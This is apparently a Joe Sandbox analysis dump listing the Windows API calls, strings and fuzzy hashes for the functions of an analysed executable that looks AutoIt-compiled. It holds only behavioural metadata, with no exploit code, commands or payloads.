                                                                        • SelectObject.GDI32(00000006,?), ref: 00907470
                                                                        • DeleteObject.GDI32(?), ref: 00907479
                                                                        • DeleteDC.GDI32(00000006), ref: 00907480
                                                                        • ReleaseDC.USER32(00000000,?), ref: 0090748B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                         • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                        • String ID: (
                                                                        • API String ID: 2598888154-3887548279
                                                                        APIs
                                                                        • __close_nolock.LIBCMT ref: 008C8214
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C8256
                                                                        • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 008C851A
                                                                        • ___createFile.LIBCMT ref: 008C8539
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008C8546
                                                                        • __dosmaperr.LIBCMT ref: 008C854D
                                                                        • __free_osfhnd.LIBCMT ref: 008C856D
                                                                        Similarity
                                                                        • API ID: CloseErrorFileHandleLast___create__close_nolock__dosmaperr__free_osfhnd__lseeki64_nolock
                                                                        • String ID: t"=$t"=$t)=$t)=$tD=
                                                                        • API String ID: 1689960631-2384938829
                                                                        APIs
                                                                          • Part of subcall function 008B0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00896B0C,?,00008000), ref: 008B0973
                                                                          • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00896BAD
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00896CFA
                                                                          • Part of subcall function 0089586D: _wcscpy.LIBCMT ref: 008958A5
                                                                          • Part of subcall function 008B363D: _iswctype.LIBCMT ref: 008B3645
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                        • API String ID: 537147316-1018226102
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2D50
                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 008F2DDD
                                                                        • GetMenuItemCount.USER32(00955890), ref: 008F2E66
                                                                        • DeleteMenu.USER32(00955890,00000005,00000000,000000F5,?,?), ref: 008F2EF6
                                                                        • DeleteMenu.USER32(00955890,00000004,00000000), ref: 008F2EFE
                                                                        • DeleteMenu.USER32(00955890,00000006,00000000), ref: 008F2F06
                                                                        • DeleteMenu.USER32(00955890,00000003,00000000), ref: 008F2F0E
                                                                        • GetMenuItemCount.USER32(00955890), ref: 008F2F16
                                                                        • SetMenuItemInfoW.USER32(00955890,00000004,00000000,00000030), ref: 008F2F4C
                                                                        • GetCursorPos.USER32(?), ref: 008F2F56
                                                                        • SetForegroundWindow.USER32(00000000), ref: 008F2F5F
                                                                        • TrackPopupMenuEx.USER32(00955890,00000000,?,00000000,00000000,00000000), ref: 008F2F72
                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008F2F7E
                                                                        Similarity
                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 3993528054-0
                                                                        APIs
                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 008F9C7F
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008F9CA0
                                                                        • _wprintf.LIBCMT ref: 008F9DB9
                                                                        • _wprintf.LIBCMT ref: 008F9DD7
                                                                        Similarity
                                                                        • API ID: LoadString_wprintf$_memmove
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 3536794898-3080491070
                                                                        APIs
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • _memset.LIBCMT ref: 008E786B
                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008E78A0
                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008E78BC
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008E78D8
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008E7902
                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 008E792A
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008E7935
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008E793A
                                                                        Similarity
                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                        • API String ID: 1411258926-22481851
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090FDAD,?,?), ref: 00910E31
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                        • API String ID: 3964851224-909552448
                                                                        APIs
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                          • Part of subcall function 00897924: _memmove.LIBCMT ref: 008979AD
                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008F5330
                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008F5346
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008F5357
                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008F5369
                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008F537A
                                                                        Similarity
                                                                        • API ID: SendString$_memmove
                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                        • API String ID: 2279737902-1007645807
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 208665112-3771769585
                                                                        APIs
                                                                        • timeGetTime.WINMM ref: 008F4F7A
                                                                          • Part of subcall function 008B049F: timeGetTime.WINMM(00955310,7694B400,008A0E7B), ref: 008B04A3
                                                                        • Sleep.KERNEL32(0000000A), ref: 008F4FA6
                                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 008F4FCA
                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008F4FEC
                                                                        • SetActiveWindow.USER32 ref: 008F500B
                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008F5019
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 008F5038
                                                                        • Sleep.KERNEL32(000000FA), ref: 008F5043
                                                                        • IsWindow.USER32 ref: 008F504F
                                                                        • EndDialog.USER32(00000000), ref: 008F5060
                                                                        Similarity
                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1194449130-3405671355
                                                                        • Opcode ID: 438a3cc7ac416747ccd4eee8ea4f6061f4f4f9667522328b55a5685e69560155
                                                                        • Instruction ID: b8d7bfb3196ce923ef181aa223279eacfecbc0ddd196b6965dd25086d47e6c98
                                                                        • Opcode Fuzzy Hash: 438a3cc7ac416747ccd4eee8ea4f6061f4f4f9667522328b55a5685e69560155
                                                                        • Instruction Fuzzy Hash: 10218E7026CB0DAFE7119F71EC98A763A69FB4478AF045124F205C21B1EF718D51EB62
APIs
  • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
• CoInitialize.OLE32(00000000), ref: 008FD5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008FD67D
• SHGetDesktopFolder.SHELL32(?), ref: 008FD691
• CoCreateInstance.OLE32(00922D7C,00000000,00000001,00948C1C,?), ref: 008FD6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008FD74C
• CoTaskMemFree.OLE32(?,?), ref: 008FD7A4
• _memset.LIBCMT ref: 008FD7E1
• SHBrowseForFolderW.SHELL32(?), ref: 008FD81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008FD840
• CoTaskMemFree.OLE32(00000000), ref: 008FD847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008FD87E
• CoUninitialize.OLE32(00000001,00000000), ref: 008FD880
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow_memset
• String ID:
• API String ID: 521252376-0
• Opcode ID: 5c36e91ff983ac9a5cbc861344296ae5c50afaa9d1cfaea825b38e758a41540b
• Instruction ID: 51ebe5538c1e0a62b1fc64340217fbe69902a83c75c9ebb508489c964dae3fcb
• Opcode Fuzzy Hash: 5c36e91ff983ac9a5cbc861344296ae5c50afaa9d1cfaea825b38e758a41540b
• Instruction Fuzzy Hash: 40B1FE75A00219AFDB04DFA8C884DAEBBF9FF49314B148469F90ADB261DB30ED41CB51
APIs
• GetDlgItem.USER32(?,00000001), ref: 008EC283
• GetWindowRect.USER32(00000000,?), ref: 008EC295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008EC2F3
• GetDlgItem.USER32(?,00000002), ref: 008EC2FE
• GetWindowRect.USER32(00000000,?), ref: 008EC310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008EC364
• GetDlgItem.USER32(?,000003E9), ref: 008EC372
• GetWindowRect.USER32(00000000,?), ref: 008EC383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008EC3C6
• GetDlgItem.USER32(?,000003EA), ref: 008EC3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008EC3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 008EC3FE
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 86122f3ff8a35eb7e87b8a88287346938a7d3bba06a821fa5bdd838b516e2b69
• Instruction ID: f7e272131eed7fc4a5987b6db0010b4323c2fab029a05e0bca68046970b15e84
• Opcode Fuzzy Hash: 86122f3ff8a35eb7e87b8a88287346938a7d3bba06a821fa5bdd838b516e2b69
• Instruction Fuzzy Hash: AA514E71B10209AFDB18CFA9DD99AAEBBBAFB89310F14812DF516D7290D7709D01CB10
APIs
  • Part of subcall function 00891B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00892036,?,00000000,?,?,?,?,008916CB,00000000,?), ref: 00891B9A
• DestroyWindow.USER32(?), ref: 008920D3
• KillTimer.USER32(-00000001,?,?,?,?,008916CB,00000000,?), ref: 0089216E
• DestroyAcceleratorTable.USER32(00000000), ref: 008CBCA6
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,008916CB,00000000,?), ref: 008CBCD7
• ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,008916CB,00000000,?), ref: 008CBCEE
• ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008916CB,00000000), ref: 008CBD0A
• DeleteObject.GDI32(00000000), ref: 008CBD1C
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: f52bcf6231fdefb87450c52d8564f61a76def51bd8253865a46c3c5941fc4a70
• Instruction ID: f177912d51a24ff68c3b2f04982492b381ed01902943bdb0eb6c7569e448ccbc
• Opcode Fuzzy Hash: f52bcf6231fdefb87450c52d8564f61a76def51bd8253865a46c3c5941fc4a70
• Instruction Fuzzy Hash: F3619C30628F14EFCB35AF15D969B2977F1FB44316F58842CE642CAA71C770A890EB81
APIs
  • Part of subcall function 008925DB: GetWindowLongW.USER32(?,000000EB), ref: 008925EC
• GetSysColor.USER32(0000000F), ref: 008921D3
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 9f333bea182f1b7feedfd332c740b79bdd2ccf6a256b0c19353fecf31e103258
• Instruction ID: a81aedadef9fbb23e49b0b7b397093c506d0671e0ac466e5f5a85a15b04cd3f2
• Opcode Fuzzy Hash: 9f333bea182f1b7feedfd332c740b79bdd2ccf6a256b0c19353fecf31e103258
• Instruction Fuzzy Hash: 20419331108544FADF25AF68EC98BB97B66FB06731F184265FE65CA1E1C7318C41DB21
APIs
• CharLowerBuffW.USER32(?,?,0091F910), ref: 008FA90B
• GetDriveTypeW.KERNEL32(00000061,009489A0,00000061), ref: 008FA9D5
• _wcscpy.LIBCMT ref: 008FA9FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: d13eaeafe97634611cba2f2c107e34e1b99e28ef605a632f93fa1a0302322a06
• Instruction ID: dd7b2b87c7782b1614eded0460dcb7860ff7238b7362cf7fdf1d62aa2cf8be50
• Opcode Fuzzy Hash: d13eaeafe97634611cba2f2c107e34e1b99e28ef605a632f93fa1a0302322a06
• Instruction Fuzzy Hash: BC51BF71218305ABC714EF28C892ABFBBE5FF84354F14482DF5A9D7292DB709909CA53
APIs
• _memset.LIBCMT ref: 0091716A
• CreateMenu.USER32 ref: 00917185
• SetMenu.USER32(?,00000000), ref: 00917194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00917221
• IsMenu.USER32(?), ref: 00917237
• CreatePopupMenu.USER32 ref: 00917241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0091726E
• DrawMenuBar.USER32 ref: 00917276
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: 0222112067cd694cc20df9a4e2fd9eec6fea66810ee13ace44ef1957cd727b8b
• Instruction ID: 39d52cbc5d4e78cc6473f4dd778e157223a46eb0c6dc43a880fb52c25c20c08f
• Opcode Fuzzy Hash: 0222112067cd694cc20df9a4e2fd9eec6fea66810ee13ace44ef1957cd727b8b
• Instruction Fuzzy Hash: 81413674A1520AEFDB20DFA4D894EEABBFAFF48310F144428F915A7361D731A910DB90
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0091755E
• CreateCompatibleDC.GDI32(00000000), ref: 00917565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00917578
• SelectObject.GDI32(00000000,00000000), ref: 00917580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0091758B
• DeleteDC.GDI32(00000000), ref: 00917594
• GetWindowLongW.USER32(?,000000EC), ref: 0091759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001,?,?,?,?,008CCA95,?,?,?,?,?,?,?), ref: 009175B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009175BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 597ea9126431cc16972784cd44cfe02d1ad643d05eb47657f5dc385ddf3f2d6f
• Instruction ID: a0721c2943d14d253e87fd83cd466478967e0f64c4ada781947581fcdc308125
• Opcode Fuzzy Hash: 597ea9126431cc16972784cd44cfe02d1ad643d05eb47657f5dc385ddf3f2d6f
• Instruction Fuzzy Hash: 92316C3221821DBBDF119FA4DC08FDA7B6EFF09360F114224FA15961A0C731D851EBA4
APIs
• _memset.LIBCMT ref: 008B6E3E
  • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
• __gmtime64_s.LIBCMT ref: 008B6ED7
• __gmtime64_s.LIBCMT ref: 008B6F0D
• __gmtime64_s.LIBCMT ref: 008B6F2A
• __allrem.LIBCMT ref: 008B6F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B6F9C
• __allrem.LIBCMT ref: 008B6FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B6FD1
• __allrem.LIBCMT ref: 008B6FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B7006
• __invoke_watson.LIBCMT ref: 008B7077
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: cb9c78e188d2453352711b1ec4d3aae295e34ed609c3b7464647634982f1b3bd
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: 02711472A00B16ABD714AE6CDC41BAAB7B8FF44324F14822AF514D7381F774EA518B91
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2542
                                                                        • GetMenuItemInfoW.USER32(00955890,000000FF,00000000,00000030), ref: 008F25A3
                                                                        • SetMenuItemInfoW.USER32(00955890,00000004,00000000,00000030), ref: 008F25D9
                                                                        • Sleep.KERNEL32(000001F4), ref: 008F25EB
                                                                        • GetMenuItemCount.USER32(?), ref: 008F262F
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 008F264B
                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 008F2675
                                                                        • GetMenuItemID.USER32(?,?), ref: 008F26BA
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008F2700
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008F2714
                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008F2735
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                        • String ID:
                                                                        • API String ID: 4176008265-0
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00916FA5
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00916FA8
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00916FCC
                                                                        • _memset.LIBCMT ref: 00916FDD
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00916FEF
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00917067
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 830647256-0
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008E6BBF
                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 008E6C18
                                                                        • VariantInit.OLEAUT32(?), ref: 008E6C2A
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 008E6C4A
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 008E6C9D
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 008E6CB1
                                                                        • VariantClear.OLEAUT32(?), ref: 008E6CC6
                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 008E6CD3
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008E6CDC
                                                                        • VariantClear.OLEAUT32(?), ref: 008E6CEE
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008E6CF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0091D47C
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0091D49C
                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0091D6D7
                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0091D6F5
                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0091D716
                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0091D735
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0091D75A
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0091D77D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                        • String ID:
                                                                        • API String ID: 1211466189-3916222277
                                                                        APIs
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • CoInitialize.OLE32 ref: 00908403
                                                                        • CoUninitialize.OLE32 ref: 0090840E
